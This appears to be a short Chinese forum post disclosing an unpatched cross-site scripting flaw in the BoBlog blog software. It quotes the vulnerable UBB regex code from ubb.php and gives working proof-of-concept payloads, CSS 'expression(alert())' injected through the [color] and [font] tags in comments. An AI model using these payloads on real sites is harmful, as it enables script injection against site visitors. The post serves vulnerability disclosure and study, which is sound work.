漏洞发现者是lib3rt3，我帮他待发罢了。

BoBlog跨站漏洞
今天抽空看了下Boblog的代码，发现了个跨站漏洞，影响最新版，目前官方没出补丁（呵呵，貌似偶有点不厚道）， 看下ubb.php的代码：

Copy code

$regubb_search = array(
.......
"/\[color=([^\[\<]+?)\](.+?)\[\/color\]/i",
"/\[font=([^\[\<]+?)\](.+?)\[\/font\]/i",
.......
);
$regubb_replace = array(
.......
"<span style=\"color: \\2\\1;\">\\2</span>",
"<span style=\"font-family: \\2\\1;\">\\2</span>",
.......
);
$str=preg_replace($regubb_search, $regubb_replace, $str);

哈哈，没有对style里的东东过滤，在评论或留言处写：

Copy code

[color=expression(alert())]lib3rt3[/color]

至于跨站的具体利用，我想大家都比我明白：）

官方只知道处理color，没处理font，

Copy code

[font=expression(alert())]lib3rt3[/font]